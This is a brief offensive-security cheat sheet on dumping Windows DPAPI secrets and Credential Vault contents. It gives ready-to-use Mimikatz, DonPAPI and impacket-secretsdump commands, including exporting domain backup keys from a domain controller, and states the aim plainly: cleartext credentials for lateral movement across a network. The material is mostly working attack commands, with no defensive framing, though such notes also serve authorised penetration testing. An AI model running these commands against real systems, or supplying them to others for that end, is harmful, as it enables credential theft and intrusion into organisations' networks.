Extract DPAPI and Credentials Vault
Tools: Mimikatz , DonPAPI , impacket-secretsdump
dpapi.py vault -vcrd <vault_file> -vpol <vault_policy_file> -key <master_key>DonPAPI.py domain.local/user1:password@<target>dpapi.py backupkeys --export -t domain.local/user1:password@<DC_IP>DonPAPI.py -pvk domain_backupkey.pvk domain.local/user1:password@<targets>1) Mimikatz
mimikatz.exe "sekurlsa::dpapi"2) impacket-secretsdump
impacket-secretsdump DOMAIN/USER:PASSWORD@IP3) DonPAPI
DonPAPI.py DOMAIN/USER:PASSWORD@TARGETDumping DPAPI will give us cleartext credentials so that we can laterally move within the network
Last updated